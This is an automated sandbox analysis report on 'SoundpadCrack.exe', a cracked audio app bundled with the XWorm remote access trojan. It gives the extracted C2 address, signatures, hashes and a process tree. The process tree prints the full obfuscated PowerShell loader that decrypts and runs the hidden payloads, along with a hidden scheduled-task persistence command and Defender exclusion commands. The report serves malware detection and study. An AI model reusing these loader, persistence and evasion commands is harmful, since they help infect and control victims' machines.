Overview

overview

10

Static

static

3

SoundpadCrack.exe

windows7-x64

8

SoundpadCrack.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    109s
  • max time network
    122s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/06/2024, 22:12

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    SoundpadCrack.exe

  • Size

    8.7MB

  • MD5

    c0aeb81be9a7f88af4a36e3e646dc3c5

  • SHA1

    94817a864fb081074a7791a5d1ba118cf47a956d

  • SHA256

    054f6d798fd4a1ec3277da62d9e8e7dd7442cf2987ae28578381bdcb786342dd

  • SHA512

    88467c8e039175668804d2449c9036ca88ccb4406dd42f20b85c0562dd89e8df7eb6de0f55208f121d5755ea1d107615f3c277fb5bb9a5119a054c1ab99e330c

  • SSDEEP

    196608:V3GEsUvU3MyTpgJQLpdXk5AvRkYNd012erwKnFdZlGP1+H4mbqRHXjF:9sUMZTpgn5Ah3ozZlGNZI83h

Score
10/10
xwormexecutionpersistenceprivilege_escalationrattrojanupx

Malware Config

Extracted

Family

xworm

Version

5.0

C2

might-hk.gl.at.ply.gg:42295

Mutex

07x0yTqR2FSkwbSm

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    systemprocess.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

    persistenceprivilege_escalation
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SoundpadCrack.exe
    "C:\Users\Admin\AppData\Local\Temp\SoundpadCrack.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:228
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start "" "extrahelper.bat" & start "" "soundpad.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2232
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "extrahelper.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5096
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vJT6fStKg0zjGiy7XVLKIoIq02djrp3n5TnkMWwlDwM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hEEtcPzCu4poxw0XIUJw0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SHNnY=New-Object System.IO.MemoryStream(,$param_var); $qIcru=New-Object System.IO.MemoryStream; $LvUqn=New-Object System.IO.Compression.GZipStream($SHNnY, [IO.Compression.CompressionMode]::Decompress); $LvUqn.CopyTo($qIcru); $LvUqn.Dispose(); $SHNnY.Dispose(); $qIcru.Dispose(); $qIcru.ToArray();}function execute_function($param_var,$param2_var){ $zuAhi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LIRQa=$zuAhi.EntryPoint; $LIRQa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\extrahelper.bat';$jhCzE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\RarSFX0\extrahelper.bat').Split([Environment]::NewLine);foreach ($Vlubi in $jhCzE) { if ($Vlubi.StartsWith(':: ')) { $gKUWY=$Vlubi.Substring(3); break; }}$payloads_var=[string[]]$gKUWY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5016
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_12_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_12.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2968
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_12.vbs"
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2120
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_12.bat" "
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1068
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vJT6fStKg0zjGiy7XVLKIoIq02djrp3n5TnkMWwlDwM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hEEtcPzCu4poxw0XIUJw0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SHNnY=New-Object System.IO.MemoryStream(,$param_var); $qIcru=New-Object System.IO.MemoryStream; $LvUqn=New-Object System.IO.Compression.GZipStream($SHNnY, [IO.Compression.CompressionMode]::Decompress); $LvUqn.CopyTo($qIcru); $LvUqn.Dispose(); $SHNnY.Dispose(); $qIcru.Dispose(); $qIcru.ToArray();}function execute_function($param_var,$param2_var){ $zuAhi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LIRQa=$zuAhi.EntryPoint; $LIRQa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_12.bat';$jhCzE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_12.bat').Split([Environment]::NewLine);foreach ($Vlubi in $jhCzE) { if ($Vlubi.StartsWith(':: ')) { $gKUWY=$Vlubi.Substring(3); break; }}$payloads_var=[string[]]$gKUWY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Drops startup file
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:3796
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3892
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4444
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\systemprocess.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3844
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemprocess.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3820
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Soundpad.exe
        "soundpad.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in System32 directory
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1688
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\SoundpadService.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\SoundpadService.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:5012
        • C:\Windows\System32\regsvr32.exe
          "C:\Windows\System32\regsvr32.exe" /s "C:\Windows\system32\UniteFx.dll"
          4⤵
          • Loads dropped DLL
          • Modifies registry class
          PID:1800
        • C:\Windows\System32\regsvr32.exe
          "C:\Windows\System32\regsvr32.exe" /s "C:\Windows\system32\UniteFx.dll"
          4⤵
          • Loads dropped DLL
          • Modifies registry class
          PID:4176
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x4fc 0x504
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2656

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          3KB

          MD5

          661739d384d9dfd807a089721202900b

          SHA1

          5b2c5d6a7122b4ce849dc98e79a7713038feac55

          SHA256

          70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

          SHA512

          81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          f8d49a4af7a844bfc7247d5670def557

          SHA1

          26ae0ce194a77a7a1887cf93741293fdfa6c94c4

          SHA256

          61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b

          SHA512

          9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          77d622bb1a5b250869a3238b9bc1402b

          SHA1

          d47f4003c2554b9dfc4c16f22460b331886b191b

          SHA256

          f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

          SHA512

          d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          da5c82b0e070047f7377042d08093ff4

          SHA1

          89d05987cd60828cca516c5c40c18935c35e8bd3

          SHA256

          77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

          SHA512

          7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          ce4540390cc4841c8973eb5a3e9f4f7d

          SHA1

          2293f30a6f4c9538bc5b06606c10a50ab4ecef8e

          SHA256

          e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105

          SHA512

          2a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Profile\CRACKED BY Ray_Black\SteamUserID.cfg
          Filesize

          61B

          MD5

          62edbc0689f3819eb0b7ca1fce5cd8ef

          SHA1

          292927a1b5150e98f40dc4aa67e3d29d07096065

          SHA256

          dc079a34addb9d3ad7bf19cc845c17e58fd1e0f02dccef36941240b52cb158d8

          SHA512

          7909b368c9bdda8d97703d379cc128f851740042130eb7f4484215dc19250508d616ce9f981f0c41c30d12a4fd5225be9d37e93165e2c905096241fd7d156d2e

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Soundpad.exe
          Filesize

          11.7MB

          MD5

          186dd6db5675edc1a5c70dfd1f48e205

          SHA1

          c76f15edfb347c94f7e01d011ad27ecf5e204550

          SHA256

          52dc2fd4102cfcb49e04400db09a246c70b202d889550b912cf8001ae1b3e55a

          SHA512

          062198a0e2f86f82ebb9afa5dfd728423f898f9ac32ebf0cb2282a6d145c0941eef85a6ca8a800f581dcfef44dcf2ffc5788486936926528a2611d00aace117b

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\SoundpadService.exe
          Filesize

          299KB

          MD5

          b684849f377d67a5334524a01b4d6f9b

          SHA1

          1bc72eb5dc8b323a6835e491f3166576a670481f

          SHA256

          1b15187efca20081dd8a746a7dff73e7c9c970989639f6fd4083fc53afa9e204

          SHA512

          34bdbce5089a62322af81a51b4c752fc23e398eb6f3f83a062d7fa2cb1352de33e7df192ee4fda3e0a67c86f111e8ee1064b4560aae15b3c8c059c6122dc0b73

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\SteamConfig.ini
          Filesize

          135B

          MD5

          8aaae6e65f734e7f90b2d11966c76a16

          SHA1

          f910a899891026e6d22305d176a73d2588b99715

          SHA256

          c2702d244e84cb0abc4f964062b9ecf51b1697712ad4c03b37d345f93d045bba

          SHA512

          96f0c7cd0b8e2ce8365f907a03c8229ed733fdcd07a826d82aa242c870f5994d04b1987263ba2a8e0a314ab281d5cf9905cc562177e09b499a99fe3e8d3cfb5e

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\UniteFxUpdate.dll
          Filesize

          442KB

          MD5

          0ee743073ee6b68f8222be2661d95315

          SHA1

          2e642772ec19edf73422fe25a8d45db1a006ff85

          SHA256

          562b17370c7283e92a3353b76ab2aefd301c2e78782fa60ec9ee35676ad44f96

          SHA512

          c3f2037bd37cef7978187f67f1d0633ee3067b4837e0ad9ae2a5c8efab8ec4ce6a14c1d88e200ffaa8677f74fd5995789297e6a7b5ac18d19dc9d53b4d9170ba

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\extrahelper.bat
          Filesize

          265KB

          MD5

          b45b76c39b6e78b8bce0142e954312d1

          SHA1

          f2db222eb9166bf06ecf6d71bfdd59ea18352300

          SHA256

          cc7e4b15eac293f2a94d6de2a104fdb1ebac2d4cc0ba55d906eb36e47338df15

          SHA512

          b0040f9306c201d0b3357ff1812686e01ebb3db5d41cd49531a9327f197374f07dd7d861190d307e7461e2afbc841441817cbd2c1d0de0d02cc74a427cd89be7

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\languages\de\translation.mo
          Filesize

          49KB

          MD5

          6ff1d323c51c2ed88f05ee7ff468900f

          SHA1

          49c7d5042fc7644c094c3be52d7d0666c268accb

          SHA256

          5220672f99b439b1db77479ab170a5a0f2b65b4b14416b72447ded6f1ebcd40e

          SHA512

          32c065115ea0ebca406fb0d5831c39c79acb7c8e45941df8f0074a3ebd4077a61e5b8b6661a3a001114269b085877f3cdb39a456f0db42c5d492adcb06aca97b

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\languages\et_EE\translation.mo
          Filesize

          53KB

          MD5

          ed94f0e5c81c0c47073c1d9315024951

          SHA1

          1c41ae8a6783348c72d9f2ec9792782533d0be26

          SHA256

          9e7b7de3ca6f080ec99633f2c2e5c629a937268086944cc6ed5dabe2b94c120e

          SHA512

          7c7263b73252bf3eae78cf1d70ead5fbc7e4678465cf8a84c36c9efb133749ecb70ee53d563fdfc65ec11add468201446c7b9108dfc68c0985126f9002d0dfa6

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\sounds\ba dum tss.mp3
          Filesize

          43KB

          MD5

          ecfd36db4cd603fe69fb216ec96314f3

          SHA1

          e773f5862cae36da5b2c94bd9ba19f6a3b30ae2c

          SHA256

          0f346c69f70725b3c0f37d26774fd530d5fc331584a6cfd4eb90857c9be305e5

          SHA512

          644271db61503904fe8a5de3e95e3617f3faf9287862739c929be85e71d8813c30939eb5104072e11dcda71e6f66717077b2e242c33bc7fc49b22fbf5c318673

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\sounds\cue.mp3
          Filesize

          72KB

          MD5

          6048a9609cb4d0a5d2a7d833903d1f75

          SHA1

          1c76f5538c9977dbe2ab0d0e259d049410a43ee5

          SHA256

          c27d55a0413a61b5fb3f30628a2a398602405cc68b2e4e26dc7c196419bba0c6

          SHA512

          cb4a5389e1f8cf7c702522bf2bd54fbef82ad8417a5d46ef3348a35f4912b70801824eef193efe033902487c9deca37fd29782061857c9390819d381d88eccf1

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\sounds\firework.mp3
          Filesize

          40KB

          MD5

          6b19a6bf2f055cc832a8c3b8a7a520ba

          SHA1

          155d3d969d3a87e35c7aef64674baee3e95d2a49

          SHA256

          a4d6fe757479e9a99523f654cedfc5f3d062d02e7d5313d96ad5bf77f58713c6

          SHA512

          36a491302001051ba265e201ebdd9b7a637f3eadfa258f60943ce7ab333e6aa4548c448d70874fe3794fc5c5734e3bbdf3789d9e9ab67b64e9d24f1a32c20498

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\sounds\scream.mp3
          Filesize

          60KB

          MD5

          3fd3a3b313d14a4f8db4e979c38f7fc5

          SHA1

          75d00502088a8f545e1b6225d2985f0e806fd5ef

          SHA256

          d435c1e228e64b5c6883822399026b144827b54d5b06d2ab1df1462710703fc7

          SHA512

          70504de941cda487977a689e6ca2cb46505e92838b083df82a70853f876dbcf6745e42d657e90cf7a9ac5d6d6e43a443e4bef643da950e32f6ab1a30f1c44a8f

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\steam_api64.dll
          Filesize

          3.4MB

          MD5

          fde6c8bf079648ef175bfe54a48c33bd

          SHA1

          86da9176866a1f03ca8ad7fd381c3f2cfc89c6e8

          SHA256

          0a1e5c53cbad6b21de61e11f023c0d3f11f698164c743bd272741a7ba59ca5d7

          SHA512

          d750550d1abe01f8b59623e58dd366d3baa6b0a03a48f0c95f381d30481ffd20549801979c3c9d19145521a0f3dd8dbd6397347ec4d3448ab1ef4ad8e781a1ab

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4kmodz3p.vdf.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Roaming\startup_str_12.vbs
          Filesize

          114B

          MD5

          f5b01665628cfb035c0effe818ee2b0f

          SHA1

          ab8464a5cbd0580fd210ec2818982569728deb58

          SHA256

          5ac9871e4478179c4e87c9e08362ae7a7f2304985636d1b2f4a977e19d24f9a7

          SHA512

          4e8dd33faf657a4f02cbe3da6742ceb3b39311793eaa6e4fffb255687ae9b0304fa1aa8abe426b30dbd4417fab80434d04c7fc0790332affb63b9e248885f83e

          Download Submit

        • memory/1688-135-0x00007FFCEE050000-0x00007FFCEF0A0000-memory.dmp

          Filesize

          16.3MB

          Download

        • memory/3796-192-0x00000138BAEE0000-0x00000138BAF14000-memory.dmp

          Filesize

          208KB

          Download

        • memory/3796-193-0x00000138BB140000-0x00000138BB150000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3796-241-0x00000138A22D0000-0x00000138A22DC000-memory.dmp

          Filesize

          48KB

          Download

        • memory/5016-151-0x00000247B8730000-0x00000247B8738000-memory.dmp

          Filesize

          32KB

          Download

        • memory/5016-152-0x00000247D07E0000-0x00000247D0814000-memory.dmp

          Filesize

          208KB

          Download

        • memory/5016-145-0x00000247B86F0000-0x00000247B8712000-memory.dmp

          Filesize

          136KB

          Download